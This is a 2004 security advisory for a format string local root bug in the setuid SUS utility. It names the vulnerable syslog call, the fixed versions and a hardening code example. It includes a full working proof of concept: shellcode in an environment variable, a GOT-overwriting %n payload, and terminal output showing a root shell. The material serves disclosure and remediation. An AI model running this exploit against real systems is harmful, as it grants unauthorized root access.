---
Title : SUS 2.0.2 local root vulnerability
Advisory ID : LSS#2004-09-01
Date : September 14th, 2004
Advisory URL : http://security.lss.hr/index.php?page=deta...=LSS-2004-09-01
Impact : Any user can obtain root privileges
Risk level : High
Vulnerability type : Local
Vendors contacted : GENTOO Linux and Peter D. Gray (SUS author), Contact date: September 13th, 2004
---
==[ Overview
SUS is a suid root program that allows ordinary users to execute certain
programs with superuser privileges. SUS relatives are super, sudo and calife. SUS is
run by default as setuid root.
==[ Vulnerability
There is a very simple format string bug in the log() function that allows any local
user to gain root privileges. The format string vulnerability is the result of an incorrect
syslog() function call, and can be exploited directly from the command line.
log.c:
--------
void
log(char * msg)
...
openlog(ident, LOG_PID|LOG_CONS, facility);
syslog(level,msg); // <- VULNERABILITY
...
--------
==[ Affected versions
The exploitation of this vulnerability was successfully tested on SUS version 2.0.2.
==[ Fix
GENTOO Linux has released a patched version - sus-2.0.2-r1.
There is also a fixed version on sus homepage:
http://pdg.uow.edu.au/sus/sus-2.0.6.tar.Z
==[ PoC Exploit
Proof of concept code can be downloaded at http://security.lss.hr/PoC/.
==[ Credits
This vulnerability was found by Leon Juranic (ljuranic@LSS.hr).
And a working PoC (Proof of Concept):
Code:
In this PoC example, we will put shellcode in the HACK environment
variable, and overwrite the GOT entry of the getspnam() function with the HACK address.
There are NOP opcodes in the HACK variable, but in fact, they are not needed.
In the end, a root shell is spawned.
getspnam() address -> 08061780
HACK variable address -> 0xbffffb54
[root@laptop root]# objdump -R /usr/bin/sus | grep getspnam
08061780 R_386_JUMP_SLOT getspnam
[root@laptop root]# su ljuranic
[ljuranic@laptop ljuranic]$ export HACK=`perl -e 'print "\x90" x 100; print
"\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53
\x89\xe1\xcd\x80"'`
[ljuranic@laptop ljuranic]$ ./env HACK
bffffb54
[ljuranic@laptop ljuranic]$ id
uid=500(ljuranic) gid=500(ljuranic) groups=500(ljuranic)
[ljuranic@laptop ljuranic]$ sus -V
Version 2.0.2
[ljuranic@laptop ljuranic]$ ls -al /usr/bin/sus
-rws--x--x 1 root root 126189 Jan 12 18:58 /usr/bin/sus
[ljuranic@laptop ljuranic]$ sus `perl -e 'print "B\x80\x17\x06\x08\x81\x17\x06
\x08\x82\x17\x06\x08\x83\x17\x06\x08A_____%.231u%257\\$n%.167u%258\\$n%.4u%259
\\$n%.192u%260\\$n"'`
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05a#
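The fix for this bug class is to pass the untrusted message as an argument to a fixed "%s" format instead of using it as the format itself, as the patched SUS releases do. The block below is an added example, not code from the advisory or from SUS: a hardened log() wrapper beside a helper that neutralises '%' for legacy APIs that only accept a format string. The ident "sus", the LOG_AUTH facility, the function names and the sample message are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Hardened form of the advisory's log(): the untrusted message goes in as an
 * ARGUMENT to a fixed "%s" format, so '%' directives inside it are printed,
 * never interpreted.  Ident and facility here are assumed values. */
void log_safe(int level, const char *msg)
{
    openlog("sus", LOG_PID | LOG_CONS, LOG_AUTH);
    syslog(level, "%s", msg);            /* was: syslog(level, msg); */
    closelog();
}

/* For legacy APIs that only take a format string: double every '%' so each
 * becomes the literal "%%".  Returns bytes written (no NUL), -1 if no room. */
int escape_percent(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    for (const char *p = in; *p != '\0'; p++) {
        size_t need = (*p == '%') ? 2 : 1;
        if (o + need >= outlen)          /* keep room for the NUL */
            return -1;
        out[o++] = *p;
        if (*p == '%')
            out[o++] = '%';
    }
    out[o] = '\0';
    return (int)o;
}

/* Escapes msg, then uses the escaped text AS the format: output must equal
 * msg, which is exactly why the escaped form is safe to hand to a legacy API. */
int render_escaped(const char *msg, char *out, size_t outlen)
{
    char esc[256];
    if (escape_percent(msg, esc, sizeof esc) < 0)
        return -1;
    return snprintf(out, outlen, esc);   /* esc holds no live directives */
}

int main(void)
{   /* constructed sample shaped like the advisory's payload; harmless here */
    const char *msg = "user_____%.231u%257$n";
    char buf[128];
    render_escaped(msg, buf, sizeof buf);
    printf("%s\n", buf);                 /* prints the message verbatim */
    log_safe(LOG_INFO, msg);
    return 0;
}
```

Compiling with gcc's -Wformat -Wformat-security flags reports the original syslog(level, msg) pattern as a warning, which is the cheapest audit for this defect.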